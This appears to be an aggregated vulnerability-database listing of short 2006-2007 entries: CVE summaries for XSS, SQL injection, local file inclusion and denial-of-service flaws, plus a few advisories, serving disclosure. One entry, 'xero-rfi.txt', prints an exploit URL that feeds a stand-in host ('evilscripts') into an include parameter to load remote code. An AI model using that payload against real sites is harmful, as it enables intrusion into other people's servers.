Unfixed XSS vulnerability at www.barhan.cn

Security researcher CoNqUeRoR, has submitted on 02/07/2007 a cross-site-scripting XSS vulnerability affecting www.barhan.cn, which at the time of submission ranked 1992683 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 03/07/2007. It is...

CVE-2007-0763

Cross-site scripting XSS vulnerability in the news comment functionality in F3Site 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the Autor field...

Design/Logic Flaw

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 does not check for duplicate entries when adding newly discovered available contacts, which allows remote attackers to cause a denial of service disrupted communication via a flood o...

CVE-2007-0614

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote attackers to cause a denial of service persistent application crash via a crafted phsh hash attribute in a TXT key...

EUVD-2007-0612

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote attackers to cause a denial of service persistent application crash via a crafted phsh hash attribute in a TXT key...

X.Org X server: Multiple vulnerabilities

Background The X Window System is a graphical windowing system based on a client/server model. Description Multiple memory corruption vulnerabilities have been found in the ProcDbeGetVisualInfo and the ProcDbeSwapBuffers of the DBE extension, and ProcRenderAddGlyphs in the Render extension. Impac...

xero-rfi.txt

C XORON - 2007 Bug name: Xero Portal v1.2 phpbbrootpath Local File Include Vulnerablity Script Name: Xero Portal v1.2 Wrong Codes: require$phpbbrootpath . 'includes/bbcode.'.$phpEx; Exploit: www.target.com/scriptpat/admin/adminlinkdb.php?phpbbrootpath=http://evilscripts?...

Cross site scripting

Cross-site scripting XSS vulnerability in index.html aka the administration page in PHP Link Directory phpLD 3.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted link, which is triggered when the administrator uses the "Validate Links" functionality...

CVE-2007-0529

CVE-2007-0529 affects PHP Link Directory (phpLD) 3.0.6 and earlier. The vulnerability is a Cross-Site Scripting (XSS) in the admin page index.html, exploitable via a crafted link and triggered when the administrator uses the "Validate Links" functionality. The CVSS 2.0 base score is 4.3 (Medium) ...

Kerio Winroute Firewall 5.10 users credentials leak

Application: Kerio Winroute Firewall 5.10 Vendor: Kerio Technologies Inc. Vendor Site: http://www.kerio.com Remote: Yes Exploitable: Yes Risk level: Critical if proxy requires authentication Authors: Alexander Antipov & 3APA3A aka Pig Killer Authors Sites: http://www.securitylab.ru...

eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion

source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized user to view files and execute local scripts. By combining thi...

eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion

eXtreme-fusion 4.02 - FusionForumView.php Local File Inclusion source: https://www.securityfocus.com/bid/21621/info eXtreme-fusion is prone to a local file-include vulnerability because the application fails to properly sanitize user-supplied input. Exploiting this issue may allow an unauthorized...

CVE-2006-6369

SQL injection vulnerability in lib/entryreplyentry.php in Invision Community Blog Mod 1.2.4 allows remote attackers to execute arbitrary SQL commands via the eid parameter, when accessed through the "Preview message" functionality...

CVE-2006-6196

Cross-site scripting XSS vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field txtsearchtext parameter...

CVE-2006-6196

CVE-2006-6196 describes a cross-site scripting (XSS) vulnerability in the search functionality of the Fixit iDMS Pro Image Gallery. The issue allows remote attackers to inject arbitrary web script or HTML via the search field (txtsearchtext parameter). The NVD entry lists a CVSSv2 base score of 6...

CVE-2006-6196

Cross-site scripting XSS vulnerability in the search functionality in Fixit iDMS Pro Image Gallery allows remote attackers to inject arbitrary web script or HTML via a search field txtsearchtext parameter...

NVIDIA binary graphics driver: Privilege escalation vulnerability

Background The NVIDIA binary graphics driver from NVIDIA Corporation provides the kernel module and the GL modules for graphic acceleration on the NVIDIA based graphic cards. Description Rapid7 reported a boundary error in the NVIDIA binary graphics driver that leads to a buffer overflow in the...

CVE-2006-5430

CVE-2006-5430 is an XSS vulnerability affecting db-central (dbc) Enterprise CMS and db-central CMS, exploitable through the search needle parameter. The core issue is a reflected/script injection in the search functionality, enabling remote attackers to inject arbitrary script/HTML. The CVSS v2 v...

CVE-2006-5168

Cross-site scripting XSS vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...

CVE-2006-5168

Cross-site scripting XSS vulnerability in the search functionality in Simon Brown Pebble 2.0.0 RC1 and RC2 allows remote attackers to inject arbitrary web script or HTML via the query string...